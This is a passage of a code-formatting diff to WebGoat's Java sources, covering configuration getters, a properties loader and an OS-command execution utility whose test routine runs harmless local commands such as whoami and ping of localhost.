 	 * @return The databaseConnectionString value
 	 */
-	public String getDatabaseConnectionString() {
-		if (realConnectionString == null)
-			try {
-				String path = servlet.getServletContext().getRealPath(
-						"/database").replace('\\', '/');
-				System.out.println("PATH: " + path);
-				realConnectionString = databaseConnectionString.replaceAll(
-						"PATH", path);
-				System.out.println("Database Connection String: "
-						+ realConnectionString);
-			} catch (Exception e) {
-				System.out
-						.println("Couldn't open database: check web.xml database parameters");
-				e.printStackTrace();
-			}
+	public String getDatabaseConnectionString()
+	{
+		if (realConnectionString == null) try
+		{
+			String path = servlet.getServletContext().getRealPath("/database").replace('\\', '/');
+			System.out.println("PATH: " + path);
+			realConnectionString = databaseConnectionString.replaceAll("PATH", path);
+			System.out.println("Database Connection String: " + realConnectionString);
+		} catch (Exception e)
+		{
+			System.out.println("Couldn't open database: check web.xml database parameters");
+			e.printStackTrace();
+		}
 		return realConnectionString;
 	}
 
@@ -129,7 +130,8 @@ public class WebgoatContext {
 	 * 
 	 * @return The databaseDriver value
 	 */
-	public String getDatabaseDriver() {
+	public String getDatabaseDriver()
+	{
 		return (databaseDriver);
 	}
 
@@ -138,7 +140,8 @@ public class WebgoatContext {
 	 * 
 	 * @return The databaseUser value
 	 */
-	public String getDatabaseUser() {
+	public String getDatabaseUser()
+	{
 		return (databaseUser);
 	}
 
@@ -147,51 +150,63 @@ public class WebgoatContext {
 	 * 
 	 * @return The databasePassword value
 	 */
-	public String getDatabasePassword() {
+	public String getDatabasePassword()
+	{
 		return (databasePassword);
 	}
 
-	public boolean isDefuseOSCommands() {
+	public boolean isDefuseOSCommands()
+	{
 		return defuseOSCommands;
 	}
 
-	public boolean isEnterprise() {
+	public boolean isEnterprise()
+	{
 		return enterprise;
 	}
 
-	public boolean isCodingExercises() {
+	public boolean isCodingExercises()
+	{
 		return codingExercises;
 	}
-	
-	public String getFeedbackAddress() {
+
+	public String getFeedbackAddress()
+	{
 		return feedbackAddress;
 	}
 
-	public boolean isDebug() {
+	public boolean isDebug()
+	{
 		return isDebug;
 	}
 
-	public String getServletName() {
+	public String getServletName()
+	{
 		return servletName;
 	}
 
-	public boolean isShowCookies() {
+	public boolean isShowCookies()
+	{
 		return showCookies;
 	}
 
-	public boolean isShowParams() {
+	public boolean isShowParams()
+	{
 		return showParams;
 	}
 
-	public boolean isShowRequest() {
+	public boolean isShowRequest()
+	{
 		return showRequest;
 	}
 
-	public boolean isShowSource() {
+	public boolean isShowSource()
+	{
 		return showSource;
 	}
 
-	public boolean isShowSolution() {
+	public boolean isShowSolution()
+	{
 		return showSolution;
 	}
 
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/WebgoatProperties.java b/main/project/JavaSource/org/owasp/webgoat/session/WebgoatProperties.java
index e9501ad61..553d54745 100644
--- a/main/project/JavaSource/org/owasp/webgoat/session/WebgoatProperties.java
+++ b/main/project/JavaSource/org/owasp/webgoat/session/WebgoatProperties.java
@@ -1,133 +1,123 @@
+
 package org.owasp.webgoat.session;
 
 import java.io.FileInputStream;
 import java.io.IOException;
 import java.util.Properties;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class WebgoatProperties extends Properties
 {
 
-    /**
+	/**
 	 * 
 	 */
 	private static final long serialVersionUID = 4351681705558227918L;
 
-
 	public WebgoatProperties(String propertiesFileName) throws IOException
-    {
-	try
 	{
-	    FileInputStream in = new FileInputStream(propertiesFileName);
-	    load(in);
-	}
-	catch (IOException e)
-	{
-	    System.out
-		    .println("Warning: Unable to open webgoat.properties file");
-	}
-    }
-
-
-    public int getIntProperty(String key, int defaultValue)
-    {
-	int value = defaultValue;
-
-	String s = getProperty(key);
-	if (s != null)
-	{
-	    value = Integer.parseInt(s);
+		try
+		{
+			FileInputStream in = new FileInputStream(propertiesFileName);
+			load(in);
+		} catch (IOException e)
+		{
+			System.out.println("Warning: Unable to open webgoat.properties file");
+		}
 	}
 
-	return value;
-    }
-
-
-    public boolean getBooleanProperty(String key, boolean defaultValue)
-    {
-	boolean value = defaultValue;
-	key = this.trimLesson(key);
-
-	String s = getProperty(key);
-	if (s != null)
+	public int getIntProperty(String key, int defaultValue)
 	{
-	    if (s.equalsIgnoreCase("true"))
-		value = true;
-	    else if (s.equalsIgnoreCase("yes"))
-		value = true;
-	    else if (s.equalsIgnoreCase("on"))
-		value = true;
-	    else if (s.equalsIgnoreCase("false"))
-		value = false;
-	    else if (s.equalsIgnoreCase("no"))
-		value = false;
-	    else if (s.equalsIgnoreCase("off"))
-		value = false;
+		int value = defaultValue;
+
+		String s = getProperty(key);
+		if (s != null)
+		{
+			value = Integer.parseInt(s);
+		}
+
+		return value;
 	}
 
-	return value;
-    }
-
-
-    private String trimLesson(String lesson)
-    {
-	String result = "";
-
-	if (lesson.startsWith("org.owasp.webgoat.lessons."))
+	public boolean getBooleanProperty(String key, boolean defaultValue)
 	{
-	    result = lesson.substring("org.owasp.webgoat.lessons.".length(),
-		    lesson.length());
-	}
-	else
-	{
-	    result = lesson;
+		boolean value = defaultValue;
+		key = this.trimLesson(key);
+
+		String s = getProperty(key);
+		if (s != null)
+		{
+			if (s.equalsIgnoreCase("true"))
+				value = true;
+			else if (s.equalsIgnoreCase("yes"))
+				value = true;
+			else if (s.equalsIgnoreCase("on"))
+				value = true;
+			else if (s.equalsIgnoreCase("false"))
+				value = false;
+			else if (s.equalsIgnoreCase("no"))
+				value = false;
+			else if (s.equalsIgnoreCase("off")) value = false;
+		}
+
+		return value;
 	}
 
-	return result;
-    }
-
-
-    public static void main(String[] args)
-    {
-	WebgoatProperties properties = null;
-	try
+	private String trimLesson(String lesson)
 	{
-	    properties = new WebgoatProperties("C:\\webgoat.properties");
+		String result = "";
+
+		if (lesson.startsWith("org.owasp.webgoat.lessons."))
+		{
+			result = lesson.substring("org.owasp.webgoat.lessons.".length(), lesson.length());
+		}
+		else
+		{
+			result = lesson;
+		}
+
+		return result;
 	}
-	catch (IOException e)
+
+	public static void main(String[] args)
 	{
-	    System.out.println("Error loading properties");
-	    e.printStackTrace();
+		WebgoatProperties properties = null;
+		try
+		{
+			properties = new WebgoatProperties("C:\\webgoat.properties");
+		} catch (IOException e)
+		{
+			System.out.println("Error loading properties");
+			e.printStackTrace();
+		}
+		System.out.println(properties.getProperty("CommandInjection.category"));
 	}
-	System.out.println(properties.getProperty("CommandInjection.category"));
-    }
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/util/Exec.java b/main/project/JavaSource/org/owasp/webgoat/util/Exec.java
index ea061dc35..5105d7213 100644
--- a/main/project/JavaSource/org/owasp/webgoat/util/Exec.java
+++ b/main/project/JavaSource/org/owasp/webgoat/util/Exec.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.util;
 
 import java.io.ByteArrayOutputStream;
@@ -6,537 +7,520 @@ import java.io.InputStream;
 import java.io.OutputStream;
 import java.util.BitSet;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created    October 28, 2003
+ * 
+ * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created October 28, 2003
  */
 public class Exec
 {
 
-    /**
-     *  Description of the Method
-     *
-     * @param  command  Description of the Parameter
-     * @param  input    Description of the Parameter
-     * @return          Description of the Return Value
-     */
-    public static ExecResults execInput(String command, String input)
-    {
-	return (execOptions(command, input, 0, 0, false));
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  command  Description of the Parameter
-     * @return          Description of the Return Value
-     */
-    public static ExecResults execLazy(String command)
-    {
-	return (execOptions(command, "", 0, 0, true));
-    }
-
-
-    /*
-     *  Execute an OS command and capture the output in an ExecResults.
-     *  All exceptions are caught and stored in the ExecResults.
-     *  @param String command is the OS command to execute
-     *  @param String input is piped into the OS command
-     *  @param int successCode is the expected return code if the command completes successfully
-     *  @param int timeout is the number of milliseconds to wait before interrupting the command
-     *  @param boolean quit tells the method to exit when there is no more output waiting
-     */
-    /**
-     *  Description of the Method
-     *
-     * @param  command      Description of the Parameter
-     * @param  input        Description of the Parameter
-     * @param  successCode  Description of the Parameter
-     * @param  timeout      Description of the Parameter
-     * @param  lazy         Description of the Parameter
-     * @return              Description of the Return Value
-     */
-    public static ExecResults execOptions(String[] command, String input,
-	    int successCode, int timeout, boolean lazy)
-    {
-	Process child = null;
-	ByteArrayOutputStream output = new ByteArrayOutputStream();
-	ByteArrayOutputStream errors = new ByteArrayOutputStream();
-	ExecResults results = new ExecResults(command[0], input, successCode,
-		timeout);
-	BitSet interrupted = new BitSet(1);
-	boolean lazyQuit = false;
-	ThreadWatcher watcher;
-
-	try
+	/**
+	 * Description of the Method
+	 * 
+	 * @param command
+	 *            Description of the Parameter
+	 * @param input
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	public static ExecResults execInput(String command, String input)
 	{
-	    // start the command
-	    child = Runtime.getRuntime().exec(command);
+		return (execOptions(command, input, 0, 0, false));
+	}
 
-	    // get the streams in and out of the command
-	    InputStream processIn = child.getInputStream();
-	    InputStream processError = child.getErrorStream();
-	    OutputStream processOut = child.getOutputStream();
+	/**
+	 * Description of the Method
+	 * 
+	 * @param command
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	public static ExecResults execLazy(String command)
+	{
+		return (execOptions(command, "", 0, 0, true));
+	}
 
-	    // start the clock running
-	    if (timeout > 0)
-	    {
-		watcher = new ThreadWatcher(child, interrupted, timeout);
-		new Thread(watcher).start();
-	    }
+	/*
+	 * Execute an OS command and capture the output in an ExecResults. All exceptions are caught and
+	 * stored in the ExecResults. @param String command is the OS command to execute @param String
+	 * input is piped into the OS command @param int successCode is the expected return code if the
+	 * command completes successfully @param int timeout is the number of milliseconds to wait
+	 * before interrupting the command @param boolean quit tells the method to exit when there is no
+	 * more output waiting
+	 */
+	/**
+	 * Description of the Method
+	 * 
+	 * @param command
+	 *            Description of the Parameter
+	 * @param input
+	 *            Description of the Parameter
+	 * @param successCode
+	 *            Description of the Parameter
+	 * @param timeout
+	 *            Description of the Parameter
+	 * @param lazy
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	public static ExecResults execOptions(String[] command, String input, int successCode, int timeout, boolean lazy)
+	{
+		Process child = null;
+		ByteArrayOutputStream output = new ByteArrayOutputStream();
+		ByteArrayOutputStream errors = new ByteArrayOutputStream();
+		ExecResults results = new ExecResults(command[0], input, successCode, timeout);
+		BitSet interrupted = new BitSet(1);
+		boolean lazyQuit = false;
+		ThreadWatcher watcher;
 
-	    // Write to the child process' input stream
-	    if ((input != null) && !input.equals(""))
-	    {
 		try
 		{
-		    processOut.write(input.getBytes());
-		    processOut.flush();
-		    processOut.close();
-		}
-		catch (IOException e1)
+			// start the command
+			child = Runtime.getRuntime().exec(command);
+
+			// get the streams in and out of the command
+			InputStream processIn = child.getInputStream();
+			InputStream processError = child.getErrorStream();
+			OutputStream processOut = child.getOutputStream();
+
+			// start the clock running
+			if (timeout > 0)
+			{
+				watcher = new ThreadWatcher(child, interrupted, timeout);
+				new Thread(watcher).start();
+			}
+
+			// Write to the child process' input stream
+			if ((input != null) && !input.equals(""))
+			{
+				try
+				{
+					processOut.write(input.getBytes());
+					processOut.flush();
+					processOut.close();
+				} catch (IOException e1)
+				{
+					results.setThrowable(e1);
+				}
+			}
+
+			// Read from the child process' output stream
+			// The process may get killed by the watcher at any time
+			int c = 0;
+
+			try
+			{
+				while (true)
+				{
+					if (interrupted.get(0) || lazyQuit)
+					{
+						break;
+					}
+
+					// interrupted
+					c = processIn.read();
+
+					if (c == -1)
+					{
+						break;
+					}
+
+					// end of stream
+					output.write(c);
+
+					if (lazy && (processIn.available() < 1))
+					{
+						lazyQuit = true;
+					}
+
+					// if lazy and nothing then quit (after at least one read)
+				}
+
+				processIn.close();
+			} catch (IOException e2)
+			{
+				results.setThrowable(e2);
+			} finally
+			{
+				if (interrupted.get(0))
+				{
+					results.setInterrupted();
+				}
+
+				results.setOutput(output.toString());
+			}
+
+			// Read from the child process' error stream
+			// The process may get killed by the watcher at any time
+			try
+			{
+				while (true)
+				{
+					if (interrupted.get(0) || lazyQuit)
+					{
+						break;
+					}
+
+					// interrupted
+					c = processError.read();
+
+					if (c == -1)
+					{
+						break;
+					}
+
+					// end of stream
+					output.write(c);
+
+					if (lazy && (processError.available() < 1))
+					{
+						lazyQuit = true;
+					}
+
+					// if lazy and nothing then quit (after at least one read)
+				}
+
+				processError.close();
+			} catch (IOException e3)
+			{
+				results.setThrowable(e3);
+			} finally
+			{
+				if (interrupted.get(0))
+				{
+					results.setInterrupted();
+				}
+
+				results.setErrors(errors.toString());
+			}
+
+			// wait for the return value of the child process.
+			if (!interrupted.get(0) && !lazyQuit)
+			{
+				int returnCode = child.waitFor();
+				results.setReturnCode(returnCode);
+
+				if (returnCode != successCode)
+				{
+					results.setError(ExecResults.BADRETURNCODE);
+				}
+			}
+		} catch (InterruptedException i)
 		{
-		    results.setThrowable(e1);
-		}
-	    }
-
-	    // Read from the child process' output stream
-	    // The process may get killed by the watcher at any time
-	    int c = 0;
-
-	    try
-	    {
-		while (true)
+			results.setInterrupted();
+		} catch (Throwable t)
 		{
-		    if (interrupted.get(0) || lazyQuit)
-		    {
-			break;
-		    }
-
-		    // interrupted
-		    c = processIn.read();
-
-		    if (c == -1)
-		    {
-			break;
-		    }
-
-		    // end of stream
-		    output.write(c);
-
-		    if (lazy && (processIn.available() < 1))
-		    {
-			lazyQuit = true;
-		    }
-
-		    // if lazy and nothing then quit (after at least one read)
-		}
-
-		processIn.close();
-	    }
-	    catch (IOException e2)
-	    {
-		results.setThrowable(e2);
-	    }
-	    finally
-	    {
-		if (interrupted.get(0))
+			results.setThrowable(t);
+		} finally
 		{
-		    results.setInterrupted();
+			if (child != null)
+			{
+				child.destroy();
+			}
 		}
 
-		results.setOutput(output.toString());
-	    }
-
-	    // Read from the child process' error stream
-	    // The process may get killed by the watcher at any time
-	    try
-	    {
-		while (true)
-		{
-		    if (interrupted.get(0) || lazyQuit)
-		    {
-			break;
-		    }
-
-		    // interrupted
-		    c = processError.read();
-
-		    if (c == -1)
-		    {
-			break;
-		    }
-
-		    // end of stream
-		    output.write(c);
-
-		    if (lazy && (processError.available() < 1))
-		    {
-			lazyQuit = true;
-		    }
-
-		    // if lazy and nothing then quit (after at least one read)
-		}
-
-		processError.close();
-	    }
-	    catch (IOException e3)
-	    {
-		results.setThrowable(e3);
-	    }
-	    finally
-	    {
-		if (interrupted.get(0))
-		{
-		    results.setInterrupted();
-		}
-
-		results.setErrors(errors.toString());
-	    }
-
-	    // wait for the return value of the child process.
-	    if (!interrupted.get(0) && !lazyQuit)
-	    {
-		int returnCode = child.waitFor();
-		results.setReturnCode(returnCode);
-
-		if (returnCode != successCode)
-		{
-		    results.setError(ExecResults.BADRETURNCODE);
-		}
-	    }
-	}
-	catch (InterruptedException i)
-	{
-	    results.setInterrupted();
-	}
-	catch (Throwable t)
-	{
-	    results.setThrowable(t);
-	}
-	finally
-	{
-	    if (child != null)
-	    {
-		child.destroy();
-	    }
+		return (results);
 	}
 
-	return (results);
-    }
-
-
-    /*
-     *  Execute an OS command and capture the output in an ExecResults.
-     *  All exceptions are caught and stored in the ExecResults.
-     *  @param String command is the OS command to execute
-     *  @param String input is piped into the OS command
-     *  @param int successCode is the expected return code if the command completes successfully
-     *  @param int timeout is the number of milliseconds to wait before interrupting the command
-     *  @param boolean quit tells the method to exit when there is no more output waiting
-     */
-    /**
-     *  Description of the Method
-     *
-     * @param  command      Description of the Parameter
-     * @param  input        Description of the Parameter
-     * @param  successCode  Description of the Parameter
-     * @param  timeout      Description of the Parameter
-     * @param  lazy         Description of the Parameter
-     * @return              Description of the Return Value
-     */
-    public static ExecResults execOptions(String command, String input,
-	    int successCode, int timeout, boolean lazy)
-    {
-	Process child = null;
-	ByteArrayOutputStream output = new ByteArrayOutputStream();
-	ByteArrayOutputStream errors = new ByteArrayOutputStream();
-	ExecResults results = new ExecResults(command, input, successCode,
-		timeout);
-	BitSet interrupted = new BitSet(1);
-	boolean lazyQuit = false;
-	ThreadWatcher watcher;
-
-	try
+	/*
+	 * Execute an OS command and capture the output in an ExecResults. All exceptions are caught and
+	 * stored in the ExecResults. @param String command is the OS command to execute @param String
+	 * input is piped into the OS command @param int successCode is the expected return code if the
+	 * command completes successfully @param int timeout is the number of milliseconds to wait
+	 * before interrupting the command @param boolean quit tells the method to exit when there is no
+	 * more output waiting
+	 */
+	/**
+	 * Description of the Method
+	 * 
+	 * @param command
+	 *            Description of the Parameter
+	 * @param input
+	 *            Description of the Parameter
+	 * @param successCode
+	 *            Description of the Parameter
+	 * @param timeout
+	 *            Description of the Parameter
+	 * @param lazy
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	public static ExecResults execOptions(String command, String input, int successCode, int timeout, boolean lazy)
 	{
-	    // start the command
-	    child = Runtime.getRuntime().exec(command);
+		Process child = null;
+		ByteArrayOutputStream output = new ByteArrayOutputStream();
+		ByteArrayOutputStream errors = new ByteArrayOutputStream();
+		ExecResults results = new ExecResults(command, input, successCode, timeout);
+		BitSet interrupted = new BitSet(1);
+		boolean lazyQuit = false;
+		ThreadWatcher watcher;
 
-	    // get the streams in and out of the command
-	    InputStream processIn = child.getInputStream();
-	    InputStream processError = child.getErrorStream();
-	    OutputStream processOut = child.getOutputStream();
-
-	    // start the clock running
-	    if (timeout > 0)
-	    {
-		watcher = new ThreadWatcher(child, interrupted, timeout);
-		new Thread(watcher).start();
-	    }
-
-	    // Write to the child process' input stream
-	    if ((input != null) && !input.equals(""))
-	    {
 		try
 		{
-		    processOut.write(input.getBytes());
-		    processOut.flush();
-		    processOut.close();
-		}
-		catch (IOException e1)
+			// start the command
+			child = Runtime.getRuntime().exec(command);
+
+			// get the streams in and out of the command
+			InputStream processIn = child.getInputStream();
+			InputStream processError = child.getErrorStream();
+			OutputStream processOut = child.getOutputStream();
+
+			// start the clock running
+			if (timeout > 0)
+			{
+				watcher = new ThreadWatcher(child, interrupted, timeout);
+				new Thread(watcher).start();
+			}
+
+			// Write to the child process' input stream
+			if ((input != null) && !input.equals(""))
+			{
+				try
+				{
+					processOut.write(input.getBytes());
+					processOut.flush();
+					processOut.close();
+				} catch (IOException e1)
+				{
+					results.setThrowable(e1);
+				}
+			}
+
+			// Read from the child process' output stream
+			// The process may get killed by the watcher at any time
+			int c = 0;
+
+			try
+			{
+				while (true)
+				{
+					if (interrupted.get(0) || lazyQuit)
+					{
+						break;
+					}
+
+					// interrupted
+					c = processIn.read();
+
+					if (c == -1)
+					{
+						break;
+					}
+
+					// end of stream
+					output.write(c);
+
+					if (lazy && (processIn.available() < 1))
+					{
+						lazyQuit = true;
+					}
+
+					// if lazy and nothing then quit (after at least one read)
+				}
+
+				processIn.close();
+			} catch (IOException e2)
+			{
+				results.setThrowable(e2);
+			} finally
+			{
+				if (interrupted.get(0))
+				{
+					results.setInterrupted();
+				}
+
+				results.setOutput(output.toString());
+			}
+
+			// Read from the child process' error stream
+			// The process may get killed by the watcher at any time
+			try
+			{
+				while (true)
+				{
+					if (interrupted.get(0) || lazyQuit)
+					{
+						break;
+					}
+
+					// interrupted
+					c = processError.read();
+
+					if (c == -1)
+					{
+						break;
+					}
+
+					// end of stream
+					output.write(c);
+
+					if (lazy && (processError.available() < 1))
+					{
+						lazyQuit = true;
+					}
+
+					// if lazy and nothing then quit (after at least one read)
+				}
+
+				processError.close();
+			} catch (IOException e3)
+			{
+				results.setThrowable(e3);
+			} finally
+			{
+				if (interrupted.get(0))
+				{
+					results.setInterrupted();
+				}
+
+				results.setErrors(errors.toString());
+			}
+
+			// wait for the return value of the child process.
+			if (!interrupted.get(0) && !lazyQuit)
+			{
+				int returnCode = child.waitFor();
+				results.setReturnCode(returnCode);
+
+				if (returnCode != successCode)
+				{
+					results.setError(ExecResults.BADRETURNCODE);
+				}
+			}
+		} catch (InterruptedException i)
 		{
-		    results.setThrowable(e1);
-		}
-	    }
-
-	    // Read from the child process' output stream
-	    // The process may get killed by the watcher at any time
-	    int c = 0;
-
-	    try
-	    {
-		while (true)
+			results.setInterrupted();
+		} catch (Throwable t)
 		{
-		    if (interrupted.get(0) || lazyQuit)
-		    {
-			break;
-		    }
-
-		    // interrupted
-		    c = processIn.read();
-
-		    if (c == -1)
-		    {
-			break;
-		    }
-
-		    // end of stream
-		    output.write(c);
-
-		    if (lazy && (processIn.available() < 1))
-		    {
-			lazyQuit = true;
-		    }
-
-		    // if lazy and nothing then quit (after at least one read)
-		}
-
-		processIn.close();
-	    }
-	    catch (IOException e2)
-	    {
-		results.setThrowable(e2);
-	    }
-	    finally
-	    {
-		if (interrupted.get(0))
+			results.setThrowable(t);
+		} finally
 		{
-		    results.setInterrupted();
+			if (child != null)
+			{
+				child.destroy();
+			}
 		}
 
-		results.setOutput(output.toString());
-	    }
-
-	    // Read from the child process' error stream
-	    // The process may get killed by the watcher at any time
-	    try
-	    {
-		while (true)
-		{
-		    if (interrupted.get(0) || lazyQuit)
-		    {
-			break;
-		    }
-
-		    // interrupted
-		    c = processError.read();
-
-		    if (c == -1)
-		    {
-			break;
-		    }
-
-		    // end of stream
-		    output.write(c);
-
-		    if (lazy && (processError.available() < 1))
-		    {
-			lazyQuit = true;
-		    }
-
-		    // if lazy and nothing then quit (after at least one read)
-		}
-
-		processError.close();
-	    }
-	    catch (IOException e3)
-	    {
-		results.setThrowable(e3);
-	    }
-	    finally
-	    {
-		if (interrupted.get(0))
-		{
-		    results.setInterrupted();
-		}
-
-		results.setErrors(errors.toString());
-	    }
-
-	    // wait for the return value of the child process.
-	    if (!interrupted.get(0) && !lazyQuit)
-	    {
-		int returnCode = child.waitFor();
-		results.setReturnCode(returnCode);
-
-		if (returnCode != successCode)
-		{
-		    results.setError(ExecResults.BADRETURNCODE);
-		}
-	    }
+		return (results);
 	}
-	catch (InterruptedException i)
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param command
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	public static ExecResults execSimple(String[] command)
 	{
-	    results.setInterrupted();
+		return (execOptions(command, "", 0, 0, false));
 	}
-	catch (Throwable t)
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param command
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	public static ExecResults execSimple(String command)
 	{
-	    results.setThrowable(t);
+		return (execOptions(command, "", 0, 0, false));
 	}
-	finally
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param command
+	 *            Description of the Parameter
+	 * @param args
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	public static ExecResults execSimple(String command, String args)
 	{
-	    if (child != null)
-	    {
-		child.destroy();
-	    }
+		return (execOptions(command, args, 0, 0, false));
 	}
 
-	return (results);
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  command  Description of the Parameter
-     * @return          Description of the Return Value
-     */
-    public static ExecResults execSimple(String[] command)
-    {
-	return (execOptions(command, "", 0, 0, false));
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  command  Description of the Parameter
-     * @return          Description of the Return Value
-     */
-    public static ExecResults execSimple(String command)
-    {
-	return (execOptions(command, "", 0, 0, false));
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  command  Description of the Parameter
-     * @param  args     Description of the Parameter
-     * @return          Description of the Return Value
-     */
-    public static ExecResults execSimple(String command, String args)
-    {
-	return (execOptions(command, args, 0, 0, false));
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  command  Description of the Parameter
-     * @param  timeout  Description of the Parameter
-     * @return          Description of the Return Value
-     */
-    public static ExecResults execTimeout(String command, int timeout)
-    {
-	return (execOptions(command, "", 0, timeout, false));
-    }
-
-
-    /**
-     *  The main program for the Exec class
-     *
-     * @param  args  The command line arguments
-     */
-    public static void main(String[] args)
-    {
-	ExecResults results;
-	String sep = System.getProperty("line.separator");
-	System.out.println("-------------------------------------------" + sep
-		+ "TEST 1: execSimple");
-	results = Exec.execSimple("c:/swarm-2.1.1/bin/whoami.exe");
-	System.out.println(results);
-	System.out.println("-------------------------------------------" + sep
-		+ "TEST 2: execSimple (with search)");
-	results = Exec.execSimple("netstat -r");
-	System.out.println(results);
-
-	if (results.outputContains("localhost:1031"))
+	/**
+	 * Description of the Method
+	 * 
+	 * @param command
+	 *            Description of the Parameter
+	 * @param timeout
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	public static ExecResults execTimeout(String command, int timeout)
 	{
-	    System.out.println("ERROR: listening on 1031");
+		return (execOptions(command, "", 0, timeout, false));
 	}
 
-	System.out.println("-------------------------------------------" + sep
-		+ "TEST 3: execInput");
-	results = Exec.execInput("find \"cde\"",
-		"abcdefg1\nhijklmnop\nqrstuv\nabcdefg2");
-	System.out.println(results);
-	System.out.println("-------------------------------------------" + sep
-		+ "TEST 4:execTimeout");
-	results = Exec.execTimeout("ping -t 127.0.0.1", 5 * 1000);
-	System.out.println(results);
-	System.out.println("-------------------------------------------" + sep
-		+ "TEST 5:execLazy");
-	results = Exec.execLazy("ping -t 127.0.0.1");
-	System.out.println(results);
-	System.out.println("-------------------------------------------" + sep
-		+ "TEST 6:ExecTimeout process never outputs");
-	results = Exec.execTimeout("c:/swarm-2.1.1/bin/sleep.exe 20", 5 * 1000);
-	System.out.println(results);
-	System.out.println("-------------------------------------------" + sep
-		+ "TEST 7:ExecTimeout process waits for input");
-	results = Exec.execTimeout("c:/swarm-2.1.1/bin/cat", 5 * 1000);
-	System.out.println(results);
-    }
+	/**
+	 * The main program for the Exec class
+	 * 
+	 * @param args
+	 *            The command line arguments
+	 */
+	public static void main(String[] args)
+	{
+		ExecResults results;
+		String sep = System.getProperty("line.separator");
+		System.out.println("-------------------------------------------" + sep + "TEST 1: execSimple");
+		results = Exec.execSimple("c:/swarm-2.1.1/bin/whoami.exe");
+		System.out.println(results);
+		System.out.println("-------------------------------------------" + sep + "TEST 2: execSimple (with search)");
+		results = Exec.execSimple("netstat -r");
+		System.out.println(results);
+
+		if (results.outputContains("localhost:1031"))
+		{
+			System.out.println("ERROR: listening on 1031");
+		}
+
+		System.out.println("-------------------------------------------" + sep + "TEST 3: execInput");
+		results = Exec.execInput("find \"cde\"", "abcdefg1\nhijklmnop\nqrstuv\nabcdefg2");
+		System.out.println(results);
+		System.out.println("-------------------------------------------" + sep + "TEST 4:execTimeout");
+		results = Exec.execTimeout("ping -t 127.0.0.1", 5 * 1000);
+		System.out.println(results);
+		System.out.println("-------------------------------------------" + sep + "TEST 5:execLazy");
+		results = Exec.execLazy("ping -t 127.0.0.1");
